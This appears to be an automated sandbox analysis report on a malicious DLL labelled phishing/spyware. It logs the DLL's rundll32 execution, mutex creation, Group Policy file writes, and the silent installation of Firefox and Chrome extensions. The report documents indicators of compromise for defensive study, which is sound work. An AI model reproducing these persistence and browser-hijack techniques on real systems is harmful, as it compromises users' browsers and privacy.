Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/firefox/new/
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: omni.ja.bak.3.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: omni.ja.bak.3.drString found in binary or memory: https://www.yahoo.com/?fr=hp-avast&type=752

System Summary

Source: {EA8CA8DA-5FF9-493B-AC9C-93682EE7EB16}.xpi.3.dr | Zip Entry: main.js
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\system32\GroupPolicy\Adm
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\system32\GroupPolicy\Machine
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\system32\GroupPolicy\User
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\system32\GroupPolicy\Machine\Registry.pol
Source: GqjUrFW.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engine | Classification label: mal84.phis.spyw.winDLL@10/143@0/0
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Program Files\Mozilla Firefox\browser\features\{EA8CA8DA-5FF9-493B-AC9C-93682EE7EB16}.xpi
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\SwReporter
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\1_H143457741
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\1_H114011913
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\2_PhpuzIakkdPWqpI
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6288:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\1_H5174114
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\1_H139200187
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\1_H94612912
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\1_H69925949
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\1_H52000344
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\1_H106351840
Source: GqjUrFW.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Program Files\Mozilla Firefox\application.ini
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\GqjUrFW.dll,#1
Source: rundll32.exe, 00000004.00000003.1663649708.0000000004841000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: rundll32.exe, 00000004.00000003.1663649708.0000000004841000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: GqjUrFW.dll | Virustotal: Detection: 39%
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\GqjUrFW.dll"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\GqjUrFW.dll,#1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32
Source: C:\Windows\SysWOW64\rundll32.exe | Directory created: C:\Program Files\Mozilla Firefox\browser\features\{EA8CA8DA-5FF9-493B-AC9C-93682EE7EB16}.xpi
Source: C:\Windows\SysWOW64\rundll32.exe | Directory created: C:\Program Files\Mozilla Firefox\browser\omni.ja.bak
Source: GqjUrFW.dll Static file information: File size 6760960 > 1048576
Source: GqjUrFW.dll Static PE information: Raw size of .data is bigger than: 0x100000 < 0x5ec000
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\icons
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\icons\ficon128.png
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\icons\icon128.png
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\icons\icon16.png
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\icons\icon48.png
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\manifest.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\am
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\am\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ar
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ar\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\be
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\be\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\bg
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\bg\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\bn
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\bn\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ca
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ca\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\cs
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\cs\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\da
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\da\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\de
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\de\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\el
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\el\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_GB
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_GB\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_TO
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_TO\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_US
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\en_US\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\es
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\es\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\es_419
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\es_419\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\et
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\et\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fa
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fa\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fi
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fi\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fil
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fil\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fr
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\fr\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\gu
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\gu\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\he
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\he\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hi
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hi\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hr
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hr\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hu
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hu\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\id
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\id\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\it
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\it\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ja
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ja\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\kn
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\kn\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ko
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ko\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\lt
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\lt\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\lv
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\lv\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mk
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mk\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ml
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ml\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mr
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mr\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ms
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ms\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\nl
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\nl\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\no
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\no\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pl
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pl\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt_BR
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt_BR\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt_PT
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt_PT\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ro
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ro\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ru
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ru\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sk
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sk\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sl
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sl\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sq
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sq\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sr
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sr\messages.json
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sv
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sv\messages.json
